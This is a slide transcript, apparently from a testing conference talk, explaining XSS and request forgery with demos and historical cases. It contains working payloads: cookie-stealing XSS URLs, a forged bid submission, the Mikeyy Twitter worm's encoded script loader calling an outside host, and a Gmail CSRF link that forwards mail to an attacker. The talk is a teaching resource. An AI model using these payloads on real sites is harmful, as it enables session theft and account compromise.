VodQA3_PenetrationTesting_AmitDhakkad
-
Upload
vodqa -
Category
Technology
-
view
793 -
download
0
description
Transcript of VodQA3_PenetrationTesting_AmitDhakkad
AMIT DHAKAD
Application Developer
Is considered a “survivor”
Likes To Read About Black Magic & Illusions
What, why and how’s of
Penetration Testing
- Amit DhakadDeveloper
What do I plan to cover?
What is Penetration Testing?
XSS What is it? Types of XSS
Reflective XSS Stored XSS
Request Forgery What is it? Types of Request Forgery
On-site request forgery Cross-site request forgery
Demo Attack mechanisms
Real world examples
Why do we need to pay attention?
Penetration TestingSimulating a malicious attack on a
system
Cross-site scripting (XSS)Injecting javascript through user-
controllable fields
Reflective XSSInjecting javascript using url
parameters
Diagram courtesy : The Web Application Hacker’s Handbook
Attack:
http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
Stored XSSExploiting server’s ability to persist
Diagram courtesy : The Web Application Hacker’s Handbook
Attack:
Image url is set to
http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
Request ForgeryPerform unwitting actions on behalf of
the user
On-site Request Forgery (OSRF)From same domain
Attack with XSS:
Image url is set to
http://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
Attack without XSS:
Image url is set to
/bids?bid[amount]=500&bid[auction_id]=1
Cross-site Request Forgery (CSRF)
From a different domain
Same origin policy A page residing on one domain can cause an arbitrary
request to be made to another domain, but it cannot itself process the data returned from that request.
A page residing on one domain can load a script from another domain and execute this within its own context.
What can you do with XSS and Request Forgery?
Session hijacking
Performing arbitrary actions
Disclosure of user data
Real world attacks
MySpace worm by Samy (XSS + OSRF)
Bypassed all filters and added a script to his profile
The script did two things: Added the visiting user as a friend The script got copied into the user’s profile Anyone visiting the new infected user also got added as Samy’s
friend.
• Protection:• MySpace strips out the word "onreadystatechange" which is
necessary for XML-HTTP requests
• Attack:• eval('xmlhttp.onread' + 'ystatechange = callback');
Ebay – discovered by Dave Armstrong (OSRF)
Crafted url set as image url
Arbitrary bid was placed on behalf of the visiting user
Mikeyy twitter worm (XSS + OSRF)
Implemented by a 17-year old boy
"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
-- "<script src="http://www.stalkdaily.com/ajax.js"></script>"
Visiting user got infected
Infected users began twitting unwittingly.
Gmail vulnerability – discovered by Petko Petkov (CSRF)
http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&[email protected]&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
Add filter to forward all emails to the attacker’s email address
Why we need to pay attention?
Shift is towards attacking clients
Technologies don’t provide strong protection
Considered as lame attacks
Identification using automated tools is difficult
Penetration testing is considered as a separate vertical
Break your own walls before anyone else does it
Q & A
Thank you